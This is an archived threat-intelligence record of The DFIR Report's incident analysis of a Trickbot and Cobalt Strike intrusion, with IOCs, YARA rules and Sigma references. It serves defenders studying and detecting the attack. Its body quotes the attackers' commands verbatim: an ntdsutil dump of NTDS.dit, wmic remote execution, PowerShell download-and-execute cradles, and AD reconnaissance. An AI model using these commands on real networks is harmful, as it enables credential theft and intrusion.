{
	"id": "2a357310-ba52-4e50-9a16-6bf4128ebe24",
	"created_at": "2026-04-06T00:16:40.54408Z",
	"updated_at": "2026-04-10T13:11:59.667994Z",
	"deleted_at": null,
	"sha1_hash": "841e2793873e3b285ff1c9add3902d0f5ee1672b",
	"title": "Trickbot Still Alive and Well",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 951014,
	"plain_text": "Trickbot Still Alive and Well\r\nBy editor\r\nPublished: 2021-01-11 · Archived: 2026-04-05 12:49:27 UTC\r\nIn October of 2020, the group behind the infamous botnet known as Trickbot had a bad few days. The group was under concerted pressure applied by US Cyber Command, which infiltrated the botnet and allegedly provided alternate configuration files to break the bot’s connections to the larger network. At the same time, Microsoft, along with other partners, secured court orders to take over and take down Trickbot command and control servers.\r\nWhile this did appear to have a short-term effect on limiting the scope of the botnet operators, there have been reports on the limits of its effectiveness. In our collection there was certainly a drop in overall Trickbot activity, but since the October disruption we have seen it begin to rise again; this is a recent intrusion from late December.\r\nCase Summary\r\nThe Trickbot threat actors used Cobalt Strike to pivot throughout the domain, dumping lsass and ntds.dit as they went. They used tools such as AdFind, Nltest, Net, Bloodhound, and PowerView to peruse the domain, looking for highly privileged credentials to accomplish their mission. They used PowerShell, SMB, and WMI to move laterally.\r\nAfter acquiring the necessary credentials, the threat actors used a technique called Overpass-the-hash to move to a backup server before being kicked off the network. We believe that if this attack had been allowed to continue, it would have ended in domain-wide ransomware, specifically Ryuk.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe original delivery mechanism was not found, but it was likely a malicious email, based on previously known Trickbot campaigns.\r\nExecution\r\nTrickbot was manually executed on a single endpoint. 
Source: Hatching Triage | Behavioral Report\r\nPrivilege Escalation\r\nDuring the intrusion, we witnessed the threat actors elevate privileges on several systems using the built-in GetSystem named pipe privilege escalation tool in Cobalt Strike.\r\nDefense Evasion\r\nAfter executing on the infected endpoint, the Trickbot executable injected itself into the Windows Error Reporting Manager (wermgr.exe).\r\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\r\nPage 1 of 13\n\nSubsequent Trickbot command and control traffic originated from the injected wermgr.exe process.\r\nUsing the YARA rule generated by Malpedia, we were able to locate Cobalt Strike injections in the following processes.\r\nProcess Name, PID, Rule, Host\r\n\"svchost.exe\",736,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",3740,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"ctfmon.exe\",992,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",7680,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"TSE28DF.exe\",5172,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"dllhost.exe\",7440,\"win_cobalt_strike_auto\",\"endpoint1\"\r\n\"svchost.exe\",532,\"win_cobalt_strike_auto\",\"server1\"\r\n\"svchost.exe\",784,\"win_cobalt_strike_auto\",\"server2\"\r\n\"svchost.exe\",700,\"win_cobalt_strike_auto\",\"server3\"\r\nCredential Access\r\nThe threat actors employed a couple of different credential access techniques. 
The first technique used was dumping passwords from lsass on the beachhead machine.\r\nAfter they gained access to a domain controller, we witnessed them use ntdsutil to run the following command:\r\nntdsutil \"ac in ntds\" \"ifm\" \"cr fu C:\\Perflogs\\1\"\r\nThe above command was executed from a batch file that was dropped and then executed using wmic.\r\nwmic /node:\"hostname\" process call create \"C:\\Perflogs\\12.bat\"\r\nThis command, which is included in DPAT, dumps NTDS.dit to disk and has been used by Trickbot actors in the past. The above technique has been around since at least 2014 (@chriscampell).\r\nEvent IDs 2001, 2003, 102, 300, 301, 302, and 103 were all seen in response to the above command, as well as a file creation by lsass.\r\nDiscovery\r\nThe threat actors ran the AdFind utility for domain discovery.\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -gcb -sc trustdmp \u003e trustdmp.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=group)\" \u003e ad_group.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -subnets -f (objectCategory=subnet)\u003e subnets.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -sc trustdmp \u003e trustdmp.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"objectcategory=computer\" \u003e ad_computers.txt\r\nC:\\Windows\\system32\\cmd.exe /C adfind.exe -f \"(objectcategory=person)\" \u003e ad_users.txt\r\nThe following net commands were used by the threat actor.\r\nnet user\r\nnet group \"domain admins\" /domain\r\nnet group \"enterprise admins\" /domain\r\nWhile on systems, we also saw them use the following commands.\r\nsysteminfo\r\nipconfig\r\nThe following Nltest commands were executed several times 
by the threat actors over the course of the intrusion.\r\nC:\\Windows\\system32\\cmd.exe /C nltest /dclist:\"DOMAINNAME\"\r\nC:\\Windows\\system32\\cmd.exe /C nltest /domain_trusts /all_trusts\r\nThe ping command was then used to test connectivity to the domain controllers and other systems.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:57637/'); Get-NetComputer -ping -operatingsyst\r\nBloodhound was run for domain attack path enumeration.\r\n[Original]\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\n[Decoded]\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13875/'); Invoke-BloodHound -CollectionMethods\r\nThe following PowerView commands were also seen invoked by the threat actors for discovery.\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35248/'); Get-NetComputer -operatingsystem *se\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42680/'); Invoke-UserHunter -username actual_u\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:24774/'); Get-NetSession -computername actual_\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:20744/'); Get-NetRDPSession -computername actu\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42762/'); Find-LocalAdminAccess\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:57637/'); Get-NetComputer -ping -operatingsyst\r\nLateral Movement\r\nThe threat actors utilized several lateral movement techniques. 
The first of these was using a remote service to execute PowerShell from the registry.\r\nAfter decoding the above command a couple of times and XORing it, you are left with the following shellcode, which appears to include a named pipe.\r\nThis CyberChef recipe was used to decode the above PowerShell command:\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nRemove_null_bytes()\r\nRegular_expression('User defined','[0-9a-zA-Z=+/]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nRegular_expression('User defined','[0-9a-zA-Z=+/]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nThe next lateral movement method used was SMB transfer and execution of batch files.\r\nThis file was seen executed locally via cmd, and on remote systems using wmic.\r\n[Local]\r\nC:\\Windows\\system32\\cmd.exe /c C:\\Perflogs\\434.bat\r\n[Remote]\r\nwmic /node:\"192.168.1.2\" process call create \"C:\\Perflogs\\434.bat\"\r\nSMB was also used to transfer Cobalt Strike Beacon executables to the ADMIN$ share on systems, which were then executed via a service.\r\nAdditionally, we witnessed the use of overpass-the-hash. 
Here we can see a 4624 event with seclogo as the logon process and logon type 9, which tells us some form of pass-the-hash occurred.\r\nShortly after, we see a couple of Kerberos service ticket requests for that user.\r\nThis alert fired a couple of times based on network activity.\r\nHere’s some helpful information from Stealthbits when looking for PTH or OPTH.\r\nCommand and Control\r\nCobalt Strike C2 #1:\r\n195.123.213.82:443\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nJA3: 51c64c77e60f3980eea90869b68c58a8, 72a589da586844d7f0818ce684948eea\r\nCertificate: [40:55:6e:74:38:4f:f5:64:95:52:c6:0b:88:c3:f4:02:d9:0c:0c:01]\r\nNot Before: 2020/12/07 08:36:31\r\nNot After: 2021/12/07 08:36:31\r\nIssuer Org: jQuery\r\nSubject Common: jquery.com\r\nSubject Org: jQuery\r\nPublic Algorithm: rsaEncryption\r\nJARM: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nExtracted Cobalt Strike Config:\r\nCobalt Strike C2 #2:\r\n88.119.174.135:356\r\nhtpdomrtx.com\r\nJA3s: ae4edc6faf64d08308082ad26be60767, 649d6810e8392f63dc311eecb6b7098b\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1, 649d6810e8392f63dc311eecb6b7098b\r\nCertificate: [1b:94:f1:b4:f2:e1:25:73:89:c3:e4:84:72:03:c2:d8:72:42:0d:05]\r\nNot Before: 2020/12/09 13:05:41\r\nNot After: 2021/12/09 13:05:41\r\nIssuer Org:\r\nSubject Common: htpdomrtx.com\r\nSubject Org:\r\nPublic Algorithm: rsaEncryption\r\nJARM: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nTrickbot Mor1\r\nImpact\r\nBased on the activity seen, we assess that the likely final actions would have been ransomware deployment across the domain environment.\r\nBased on research from late last year by Kyle 
Ehmke, we can assess that the likely ransomware deployment would have been Ryuk (Wizard Spider / UNC1878).\r\nEnjoy our report? Please consider donating $1 or more to the project using Patreon. Thank you for your support!\r\nWe also have pcaps, files, and Kape packages available here. No memory captures are available for this case.\r\nIOCs\r\nhttps://misppriv.circl.lu/events/view/81809 @ https://otx.alienvault.com/pulse/5ffbbb184f9ff09be2b79b21\r\nNetwork\r\nTrickbot:\r\n41.243.29.182|449\r\n196.45.140.146|449\r\n103.87.25.220|443\r\n103.98.129.222|449\r\n103.87.25.220|449\r\n103.65.196.44|449\r\n103.65.195.95|449\r\n103.61.101.11|449\r\n103.61.100.131|449\r\n103.150.68.124|449\r\n103.137.81.206|449\r\n103.126.185.7|449\r\n103.112.145.58|449\r\n103.110.53.174|449\r\n102.164.208.48|449\r\n102.164.208.44|449\r\nCobalt Strike:\r\n88.119.174.135\r\nhtpdomrtx.com\r\n195.123.213.82\r\nEndpoint\r\nkpsiwn.exe\r\n4103d97c7cad79f050901aace0d9fbe0\r\ndead0bd2345e9769b5545f4ff628e5c59fb5ef9e\r\ne410123bde6a317cadcaf1fa3502301b7aad6f528d59b6b60c97be077ef5da00\r\nTSE588C.exe\r\n7e8af0acdc11b434ab2f1b6aae336027\r\nf8ceedecd74b161a7ea743a49e36120f48bb8c09\r\n32c13df5d411bf5a114e2021bbe9ffa5062ed1db91075a55fe4182b3728d62fe\r\nTSE28DF.exe\r\nc51ff408d6f9f78ab6fd41dbea1a9c01\r\n78188c006079cc3edb1ea37c8d1b2638da6bec40\r\n65282e01d57bbc75f24629be9de126f2033957bd8fe2f16ca2a12d9b30220b47\r\n12.bat\r\n49ada65eb7a29b03c5aeda0a43417f2b\r\nb47818f7094b57a4042c04678a067553ef477318\r\nb1deb8819c7659f3948a84032101cc61cad3801ee14d8df78e9e01b9c9d832d6\r\nDetections\r\nNetwork\r\nETPRO TROJAN Observed Malicious SSL Cert (Cobalt Strike CnC)\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nETPRO TROJAN Observed Trickbot Style SSL Cert (Internet Widgets Pty Ltd)\r\nET POLICY Possible External IP Lookup ipinfo.io\r\nET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection\r\nATTACK 
[PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_recon_ac\r\nhttps://github.com/Neo23x0/sigma/blob/126a17a27696ee6aaaf50f8673a659124e260143/rules/windows/process_creation/win_susp_adfind.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_\r\nhttps://github.com/Neo23x0/sigma/blob/d30502cdabbdd31a21f0b6ada019805caaea524d/rules/windows/process_creation/win_susp_wmi_execution.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/process_creation/win_susp_ntdsutil.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/windows/builtin/win_overpass_the_hash.yml\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-01-10\r\nIdentifier: exe\r\nReference: https://thedfirreport.com\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule cobalt_strike_TSE588C {\r\nmeta:\r\ndescription = \"exe - file TSE588C.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"32c13df5d411bf5a114e2021bbe9ffa5062ed1db91075a55fe4182b3728d62fe\"\r\nstrings:\r\n$s1 = \"mneploho86.dll\" fullword ascii\r\n$s2 = \"C:\\\\projects\\\\Project1\\\\Project1.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"boltostrashno.nfo\" fullword ascii\r\n$s6 = \"operator\u003c=\u003e\" 
fullword ascii\r\n$s7 = \"operator co_await\" fullword ascii\r\n$s8 = \"?7; ?\u003c= \u003c?= 6\u003c\" fullword ascii /* hex encoded string 'v' */\r\n$s9 = \".data$rs\" fullword ascii\r\n$s10 = \"tutoyola\" fullword ascii\r\n$s11 = \"Ommk~z#K`majg`i4.itg~\\\".jkhbozk\" fullword ascii\r\n$s12 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s13 = \"OVOVPWTOVOWOTF\" fullword ascii\r\n$s14 = \"vector too long\" fullword ascii\r\n$s15 = \"n\u003elog2\" fullword ascii\r\n$s16 = \"\\\\khk|k|4.fzz~4!!majk d\" fullword ascii\r\n$s17 = \"network reset\" fullword ascii /* Goodware String - occured 567 times */\r\n$s18 = \"wrong protocol type\" fullword ascii /* Goodware String - occured 567 times */\r\n$s19 = \"owner dead\" fullword ascii /* Goodware String - occured 567 times */\r\n$s20 = \"connection already in progress\" fullword ascii /* Goodware String - occured 567 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 900KB and\r\n( pe.imphash() == \"bb8169128c5096ea026d19888c139f1a\" or 10 of them )\r\n}\r\nrule trickbot_kpsiwn {\r\nmeta:\r\ndescription = \"exe - file kpsiwn.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"e410123bde6a317cadcaf1fa3502301b7aad6f528d59b6b60c97be077ef5da00\"\r\nstrings:\r\n$s1 = \"C:\\\\Windows\\\\explorer.exe\" fullword ascii\r\n$s2 = \"constructor or from DllMain.\" fullword ascii\r\n$s3 = \"esource\" fullword ascii\r\n$s4 = \"Snapping window demonstration\" fullword wide\r\n$s5 = \"EEEEEEEEEFFB\" ascii\r\n$s6 = \"EEEEEEEEEEFC\" ascii\r\n$s7 = \"EEEEEEEEEEFD\" ascii\r\n$s8 = \"DINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD\" fullword ascii\r\n$s9 = \"EFEEEEEEEEEB\" ascii\r\n$s10 = \"e[!0LoG\" fullword ascii\r\n$s11 = \"\u003e*P\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\" fullword ascii\r\n$s12 = \"o};k- \" 
fullword ascii\r\n$s13 = \"YYh V+ i\" fullword ascii\r\n$s14 = \"fdlvic\" fullword ascii\r\n$s15 = \"%FD%={\" fullword ascii\r\n$s16 = \"QnzwM#`8\" fullword ascii\r\n$s17 = \"xfbS/\u0026s:\" fullword ascii\r\n$s18 = \"1#jOSV9\\\"\" fullword ascii\r\n$s19 = \"JxYt1L=]\" fullword ascii\r\n$s20 = \"a3NdcMFSZEmJwXod1oyI@Tj4^mY+UsZqK3\u003efTg\u003cP*$4DC?y@esDpRk@T%t\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() == \"a885f66621e03089e6c6a82d44a5ebe3\" or 10 of them )\r\n}\r\nrule cobalt_strike_TSE28DF {\r\nmeta:\r\ndescription = \"exe - file TSE28DF.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-01-05\"\r\nhash1 = \"65282e01d57bbc75f24629be9de126f2033957bd8fe2f16ca2a12d9b30220b47\"\r\nstrings:\r\n$s1 = \"mneploho86.dll\" fullword ascii\r\n$s2 = \"C:\\\\projects\\\\Project1\\\\Project1.pdb\" fullword ascii\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s5 = \"boltostrashno.nfo\" fullword ascii\r\n$s6 = \"operator\u003c=\u003e\" fullword ascii\r\n$s7 = \"operator co_await\" fullword ascii\r\n$s8 = \".data$rs\" fullword ascii\r\n$s9 = \"tutoyola\" fullword ascii\r\n$s10 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s11 = \"vector too long\" fullword ascii\r\n$s12 = \"wrong protocol type\" fullword ascii /* Goodware String - occured 567 times */\r\n$s13 = \"network reset\" fullword ascii /* Goodware String - occured 567 times */\r\n$s14 = \"owner dead\" fullword ascii /* Goodware String - occured 567 times */\r\n$s15 = \"connection already in progress\" fullword ascii /* Goodware String - occured 567 times */\r\n$s16 = \"network down\" fullword ascii /* Goodware String - occured 567 times */\r\n$s17 = \"protocol not supported\" fullword ascii /* Goodware String - occured 568 times 
*/\r\n$s18 = \"connection aborted\" fullword ascii /* Goodware String - occured 568 times */\r\n$s19 = \"network unreachable\" fullword ascii /* Goodware String - occured 569 times */\r\n$s20 = \"host unreachable\" fullword ascii /* Goodware String - occured 571 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n( pe.imphash() == \"ab74ed3f154e02cfafb900acffdabf9e\" or all of them )\r\n}\r\nMITRE\r\nUser Execution – T1204\r\nPass the Hash – T1550.002\r\nSMB/Windows Admin Shares – T1021.002\r\nProcess Injection – T1055\r\nOS Credential Dumping – T1003\r\nCredential Dumping – T1003\r\nAccount Discovery – T1087\r\nDomain Account – T1087.002\r\nDomain Groups – T1069.002\r\nDomain Trust Discovery – T1482\r\nRemote System Discovery – T1018\r\nRemote Services – T1021\r\nWindows Management Instrumentation – T1047\r\nPowerShell – T1059.001\r\nCommand-Line Interface – T1059\r\nCommonly Used Port – T1043\r\nNon-Standard Port – T1571\r\nStandard Application Layer Protocol – T1071\r\nExfiltration Over C2 Channel – T1041\r\nInternal case 1012\r\nSource: https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/"
	],
	"report_names": [
		"trickbot-still-alive-and-well"
	],
	"threat_actors": [
		{
			"id": "12211366-1f14-4eed-9d91-46b6a2ede618",
			"created_at": "2025-08-07T02:03:25.014713Z",
			"updated_at": "2026-04-10T02:00:03.624097Z",
			"deleted_at": null,
			"main_name": "GOLD ULRICK",
			"aliases": [
				"Grim Spider ",
				"UNC1878 "
			],
			"source_name": "Secureworks:GOLD ULRICK",
			"tools": [
				"Bloodhound",
				"Buer Loader",
				"Cobalt Strike",
				"Conti",
				"Diavol",
				"PowerShell Empire",
				"Ryuk",
				"SystemBC",
				"Team9 (aka BazarLoader)",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ab9d6b30-7c60-4d0b-8f49-e2e913c28508",
			"created_at": "2022-10-25T16:07:24.584775Z",
			"updated_at": "2026-04-10T02:00:05.042135Z",
			"deleted_at": null,
			"main_name": "UNC1878",
			"aliases": [],
			"source_name": "ETDA:UNC1878",
			"tools": [
				"Agentemis",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"KEGTAP",
				"Ryuk",
				"Team9Backdoor",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0a4f4edc-ea8c-4a30-8ded-35394e29de01",
			"created_at": "2023-01-06T13:46:39.178183Z",
			"updated_at": "2026-04-10T02:00:03.23716Z",
			"deleted_at": null,
			"main_name": "UNC1878",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC1878",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434600,
	"ts_updated_at": 1775826719,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.pdf",
		"text": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.txt",
		"img": "https://archive.orkl.eu/841e2793873e3b285ff1c9add3902d0f5ee1672b.jpg"
	}
}